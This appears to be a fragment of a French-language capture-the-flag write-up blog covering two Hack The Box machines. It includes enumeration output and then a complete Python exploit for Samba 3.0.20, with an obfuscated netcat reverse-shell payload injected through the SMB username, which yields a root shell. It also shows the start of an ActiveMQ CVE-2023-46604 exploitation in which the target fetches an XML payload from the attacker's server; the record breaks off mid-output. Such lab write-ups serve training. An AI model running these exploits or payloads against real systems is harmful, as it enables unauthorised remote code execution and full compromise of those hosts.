<span class="o">[</span>+<span class="o">]</span> Reset Account Lockout Counter: <span class="m">30</span> minutes </span></span><span class="line"><span class="cl"> <span class="o">[</span>+<span class="o">]</span> Locked Account Duration: <span class="m">30</span> minutes </span></span><span class="line"><span class="cl"> <span class="o">[</span>+<span class="o">]</span> Account Lockout Threshold: None </span></span><span class="line"><span class="cl"> <span class="o">[</span>+<span class="o">]</span> Forced Log off Time: Not Set </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Retieved partial password policy with rpcclient: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Password Complexity: Disabled </span></span><span class="line"><span class="cl">Minimum Password Length: <span class="nv">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="o">========================================(</span> Groups on 10.10.10.3 <span class="o">)========================================</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Getting <span class="nb">builtin</span> groups: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Getting <span class="nb">builtin</span> group memberships: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Getting <span class="nb">local</span> groups: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Getting <span class="nb">local</span> group memberships: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Getting domain groups: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Getting domain group memberships: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="o">===================(</span> Users on 10.10.10.3 via RID cycling <span class="o">(</span>RIDS: 500-550,1000-1050<span class="o">)</span> <span class="o">)===================</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>I<span class="o">]</span> Found new SID: </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Enumerating users using SID S-1-5-21-2446995257-2525374255-2673161615 and logon username <span class="s1">&#39;&#39;</span>, password <span class="s1">&#39;&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-500 LAME<span class="se">\A</span>dministrator <span class="o">(</span>Local User<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-501 LAME<span class="se">\n</span>obody <span class="o">(</span>Local User<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-512 LAME<span class="se">\D</span>omain Admins <span class="o">(</span>Domain Group<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-513 LAME<span class="se">\D</span>omain Users <span class="o">(</span>Domain Group<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-514 LAME<span class="se">\D</span>omain Guests <span class="o">(</span>Domain Group<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1000 LAME<span class="se">\r</span>oot <span class="o">(</span>Local User<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1001 LAME<span class="se">\r</span>oot <span class="o">(</span>Domain Group<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1002 LAME<span class="se">\d</span>aemon <span class="o">(</span>Local User<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1003 LAME<span class="se">\d</span>aemon <span class="o">(</span>Domain Group<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1004 LAME<span class="se">\b</span>in <span class="o">(</span>Local User<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1005 LAME<span class="se">\b</span>in <span class="o">(</span>Domain Group<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1006 LAME<span class="se">\s</span>ys <span class="o">(</span>Local User<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1007 LAME<span class="se">\s</span>ys <span class="o">(</span>Domain Group<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1008 LAME<span class="se">\s</span>ync <span class="o">(</span>Local User<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1009 LAME<span class="se">\a</span>dm <span class="o">(</span>Domain Group<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1010 LAME<span class="se">\g</span>ames <span class="o">(</span>Local User<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1011 LAME<span class="se">\t</span>ty <span class="o">(</span>Domain Group<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1012 LAME<span class="se">\m</span>an <span class="o">(</span>Local User<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1013 LAME<span class="se">\d</span>isk <span class="o">(</span>Domain Group<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1014 LAME<span class="se">\l</span>p <span class="o">(</span>Local User<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1015 LAME<span class="se">\l</span>p <span class="o">(</span>Domain Group<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1016 LAME<span class="se">\m</span>ail <span class="o">(</span>Local User<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1017 LAME<span class="se">\m</span>ail <span class="o">(</span>Domain Group<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1018 LAME<span class="se">\n</span>ews <span class="o">(</span>Local User<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1019 LAME<span class="se">\n</span>ews <span class="o">(</span>Domain Group<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1020 LAME<span class="se">\u</span>ucp <span class="o">(</span>Local User<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1021 LAME<span class="se">\u</span>ucp <span class="o">(</span>Domain Group<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1025 LAME<span class="se">\m</span>an <span class="o">(</span>Domain Group<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1026 LAME<span class="se">\p</span>roxy <span class="o">(</span>Local User<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1027 LAME<span class="se">\p</span>roxy <span class="o">(</span>Domain Group<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1031 LAME<span class="se">\k</span>mem <span class="o">(</span>Domain Group<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1041 LAME<span class="se">\d</span>ialout <span class="o">(</span>Domain Group<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1043 LAME<span class="se">\f</span>ax <span class="o">(</span>Domain Group<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1045 LAME<span class="se">\v</span>oice <span class="o">(</span>Domain Group<span class="o">)</span> </span></span><span class="line"><span class="cl">S-1-5-21-2446995257-2525374255-2673161615-1049 LAME<span class="se">\c</span>drom <span class="o">(</span>Domain Group<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="o">================================(</span> Getting printer info <span class="k">for</span> 10.10.10.3 <span class="o">)================================</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">No printers returned. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">enum4linux <span class="nb">complete</span> on Tue Dec <span class="m">17</span> 17:02:53 <span class="m">2024</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="exploitation">Exploitation </h2><h3 id="samba-smbd-3020-debian">Samba smbd 3.0.20-Debian </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ cat exploit.py </span></span><span class="line"><span class="cl"><span class="c1">#!/usr/bin/python3</span> </span></span><span class="line"><span class="cl"><span class="c1">#exploit Samba smbd 3.0.20-Debian</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">from smb import * </span></span><span class="line"><span class="cl">from smb.SMBConnection import * </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.16.11 LPORT=1337 -f python</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">=</span> b<span class="s2">&#34;&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x6d\x69\x66\x75\x63\x3b\x20\x6e\x63\x20\x31\x30&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x2e\x31\x30\x2e\x31\x36\x2e\x31\x31\x20\x31\x33&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x33\x37\x20\x30\x3c\x2f\x74\x6d\x70\x2f\x6d\x69&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x66\x75\x63\x20\x7c\x20\x2f\x62\x69\x6e\x2f\x73&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x68\x20\x3e\x2f\x74\x6d\x70\x2f\x6d\x69\x66\x75&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x63\x20\x32\x3e\x26\x31\x3b\x20\x72\x6d\x20\x2f&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">buf</span> <span class="o">+=</span> b<span class="s2">&#34;\x74\x6d\x70\x2f\x6d\x69\x66\x75\x63&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">userID</span> <span class="o">=</span> <span class="s2">&#34;/=` nohup &#34;</span> + buf.decode<span class="o">(</span><span class="s1">&#39;utf-8&#39;</span><span class="o">)</span> + <span class="s2">&#34;`&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">password</span> <span class="o">=</span> <span class="s1">&#39;password&#39;</span> </span></span><span class="line"><span class="cl"><span class="nv">victim_ip</span> <span class="o">=</span> <span class="s1">&#39;10.10.10.3&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">conn</span> <span class="o">=</span> SMBConnection<span class="o">(</span>userID, password, <span class="s2">&#34;HELLO&#34;</span>, <span class="s2">&#34;TEST&#34;</span>, <span class="nv">use_ntlm_v2</span><span class="o">=</span>False<span class="o">)</span> </span></span><span class="line"><span class="cl">conn.connect<span class="o">(</span>victim_ip, 445<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------------------ </span></span><span class="line"><span class="cl">$ python3 exploit.py </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">Listening on 0.0.0.0 <span class="m">1337</span> </span></span><span class="line"><span class="cl">Connection received on 10.10.10.3 <span class="m">48005</span> </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">cat /root/root.txt </span></span><span class="line"><span class="cl">03ce.....b6ed </span></span></code></pre></td></tr></table> </div> </div><h3 id="user-flag---makis">user flag - makis </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">root@lame:/home# <span class="nb">cd</span> /home/makis/ </span></span><span class="line"><span class="cl">root@lame:/home/makis# ls </span></span><span class="line"><span class="cl">user.txt </span></span><span class="line"><span class="cl">root@lame:/home/makis# cat user.txt </span></span><span class="line"><span class="cl">d336.....2192 </span></span><span class="line"><span class="cl">root@lame:/home/makis# </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/broker-htb/Fri, 13 Dec 2024 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/broker-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Broker cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Broker</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.243</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nmap -sC -sV -An -p- 10.10.11.243 </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ <span class="m">256</span> 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl">80/tcp open http nginx 1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: nginx/1.18.0 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-auth: </span></span><span class="line"><span class="cl"><span class="p">|</span> HTTP/1.1 <span class="m">401</span> Unauthorized<span class="se">\x</span>0D </span></span><span class="line"><span class="cl"><span class="p">|</span>_ basic <span class="nv">realm</span><span class="o">=</span>ActiveMQRealm </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Error <span class="m">401</span> Unauthorized </span></span><span class="line"><span class="cl">1883/tcp open mqtt </span></span><span class="line"><span class="cl"><span class="p">|</span> mqtt-subscribe: </span></span><span class="line"><span class="cl"><span class="p">|</span> Topics and their most recent payloads: </span></span><span class="line"><span class="cl"><span class="p">|</span> ActiveMQ/Advisory/Consumer/Topic/#: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ ActiveMQ/Advisory/MasterBroker: </span></span><span class="line"><span class="cl">5672/tcp open amqp? </span></span><span class="line"><span class="cl"><span class="p">|</span>_amqp-info: ERROR: AQMP:handshake expected header <span class="o">(</span>1<span class="o">)</span> frame, but was <span class="m">65</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> fingerprint-strings: </span></span><span class="line"><span class="cl"><span class="p">|</span> DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie: </span></span><span class="line"><span class="cl"><span class="p">|</span> AMQP </span></span><span class="line"><span class="cl"><span class="p">|</span> AMQP </span></span><span class="line"><span class="cl"><span class="p">|</span> amqp:decode-error </span></span><span class="line"><span class="cl"><span class="p">|</span>_ 7Connection from client using unsupported AMQP attempted </span></span><span class="line"><span class="cl">8161/tcp open http Jetty 9.4.39.v20210325 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Error <span class="m">401</span> Unauthorized </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Jetty<span class="o">(</span>9.4.39.v20210325<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-auth: </span></span><span class="line"><span class="cl"><span class="p">|</span> HTTP/1.1 <span class="m">401</span> Unauthorized<span class="se">\x</span>0D </span></span><span class="line"><span class="cl"><span class="p">|</span>_ basic <span class="nv">realm</span><span class="o">=</span>ActiveMQRealm </span></span><span class="line"><span class="cl">44151/tcp open tcpwrapped </span></span><span class="line"><span class="cl">61613/tcp open stomp Apache ActiveMQ </span></span><span class="line"><span class="cl"><span class="p">|</span> fingerprint-strings: </span></span><span class="line"><span class="cl"><span class="p">|</span> HELP4STOMP: </span></span><span class="line"><span class="cl"><span class="p">|</span> ERROR </span></span><span class="line"><span class="cl"><span class="p">|</span> content-type:text/plain </span></span><span class="line"><span class="cl"><span class="p">|</span> message:Unknown STOMP action: HELP </span></span><span class="line"><span class="cl"><span class="p">|</span> org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP </span></span><span class="line"><span class="cl"><span class="p">|</span> org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand<span class="o">(</span>ProtocolConverter.java:258<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> org.apache.activemq.transport.stomp.StompTransportFilter.onCommand<span class="o">(</span>StompTransportFilter.java:85<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> org.apache.activemq.transport.TransportSupport.doConsume<span class="o">(</span>TransportSupport.java:83<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> org.apache.activemq.transport.tcp.TcpTransport.doRun<span class="o">(</span>TcpTransport.java:233<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> org.apache.activemq.transport.tcp.TcpTransport.run<span class="o">(</span>TcpTransport.java:215<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ java.lang.Thread.run<span class="o">(</span>Thread.java:750<span class="o">)</span> </span></span><span class="line"><span class="cl">61614/tcp open http Jetty 9.4.39.v20210325 </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Potentially risky methods: TRACE </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Site doesn<span class="err">&#39;</span>t have a title. </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Jetty<span class="o">(</span>9.4.39.v20210325<span class="o">)</span> </span></span><span class="line"><span class="cl">61616/tcp open apachemq ActiveMQ OpenWire transport </span></span><span class="line"><span class="cl"><span class="p">|</span> fingerprint-strings: </span></span><span class="line"><span class="cl"><span class="p">|</span> NULL: </span></span><span class="line"><span class="cl"><span class="p">|</span> ActiveMQ </span></span><span class="line"><span class="cl"><span class="p">|</span> TcpNoDelayEnabled </span></span><span class="line"><span class="cl"><span class="p">|</span> SizePrefixDisabled </span></span><span class="line"><span class="cl"><span class="p">|</span> CacheSize </span></span><span class="line"><span class="cl"><span class="p">|</span> ProviderName </span></span><span class="line"><span class="cl"><span class="p">|</span> ActiveMQ </span></span><span class="line"><span class="cl"><span class="p">|</span> StackTraceEnabled </span></span><span class="line"><span class="cl"><span class="p">|</span> PlatformDetails </span></span><span class="line"><span class="cl"><span class="p">|</span> Java </span></span><span class="line"><span class="cl"><span class="p">|</span> CacheEnabled </span></span><span class="line"><span class="cl"><span class="p">|</span> TightEncodingEnabled </span></span><span class="line"><span class="cl"><span class="p">|</span> MaxFrameSize </span></span><span class="line"><span class="cl"><span class="p">|</span> MaxInactivityDuration </span></span><span class="line"><span class="cl"><span class="p">|</span> MaxInactivityDurationInitalDelay </span></span><span class="line"><span class="cl"><span class="p">|</span> ProviderVersion </span></span><span class="line"><span class="cl"><span class="p">|</span>_ 5.15.15 </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="apache-activemq-server-cve-2023-46604">Apache ActiveMQ Server (CVE-2023-46604) </h3><p>On utilise le login admin/admin pour se connecter : Sur la page principale, on remarque le numero de verion : Apache ActiveMQ 5.15.15</p> <p>Après une petite recherche sur internet on trouve rapidement une CVE avec un repo github permettant de l&rsquo;exploiter : <a class="link" href="https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ?tab=readme-ov-file" target="_blank" rel="noopener" >https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ?tab=readme-ov-file</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">./exploit -i 10.10.11.243 -u http://10.10.16.10:8001/poc-linux.xml </span></span><span class="line"><span class="cl"> _ _ _ __ __ ___ ____ ____ _____ </span></span><span class="line"><span class="cl"> / <span class="se">\ </span> ___<span class="p">|</span> <span class="p">|</span>_<span class="o">(</span>_<span class="o">)</span>_ _____<span class="p">|</span> <span class="se">\/</span> <span class="p">|</span>/ _ <span class="se">\ </span> <span class="p">|</span> _ <span class="se">\ </span>/ ___<span class="p">|</span> ____<span class="p">|</span> </span></span><span class="line"><span class="cl"> / _ <span class="se">\ </span>/ __<span class="p">|</span> __<span class="p">|</span> <span class="se">\ \ </span>/ / _ <span class="se">\ </span><span class="p">|</span><span class="se">\/</span><span class="p">|</span> <span class="p">|</span> <span class="p">|</span> <span class="p">|</span> <span class="p">|</span>_____<span class="p">|</span> <span class="p">|</span>_<span class="o">)</span> <span class="p">|</span> <span class="p">|</span> <span class="p">|</span> _<span class="p">|</span> </span></span><span class="line"><span class="cl"> / ___ <span class="se">\ </span><span class="o">(</span>__<span class="p">|</span> <span class="p">|</span>_<span class="p">|</span> <span class="p">|</span><span class="se">\ </span>V / __/ <span class="p">|</span> <span class="p">|</span> <span class="p">|</span> <span class="p">|</span>_<span class="p">|</span> <span class="p">|</span>_____<span class="p">|</span> _ &lt;<span class="p">|</span> <span class="p">|</span>___<span class="p">|</span> <span class="p">|</span>___ </span></span><span class="line"><span class="cl"> /_/ <span class="se">\_\_</span>__<span class="p">|</span><span class="se">\_</span>_<span class="p">|</span>_<span class="p">|</span> <span class="se">\_</span>/ <span class="se">\_</span>__<span class="p">|</span>_<span class="p">|</span> <span class="p">|</span>_<span class="p">|</span><span class="se">\_</span>_<span class="se">\_\ </span> <span class="p">|</span>_<span class="p">|</span> <span class="se">\_\\</span>____<span class="p">|</span>_____<span class="p">|</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Target: 10.10.11.243:61616 </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> XML URL: http://10.10.16.10:8001/poc-linux.xml </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Sending packet: 000000781f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e74657874010025687474703a2f2f31302e31302e31362e31303a383030312f706f632d6c696e75782e786d6c </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------------------------------------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">python3 -m http.server <span class="m">8001</span> </span></span><span class="line"><span class="cl">Serving HTTP on 0.0.0.0 port <span class="m">8001</span> <span class="o">(</span>http://0.0.0.0:8001/<span class="o">)</span> ... </span></span><span class="line"><span class="cl">10.10.11.243 - - <span class="o">[</span>12/Dec/2024 00:19:59<span class="o">]</span> <span class="s2">&#34;GET /poc-linux.xml HTTP/1.1&#34;</span> <span class="m">200</span> - </span></span><span 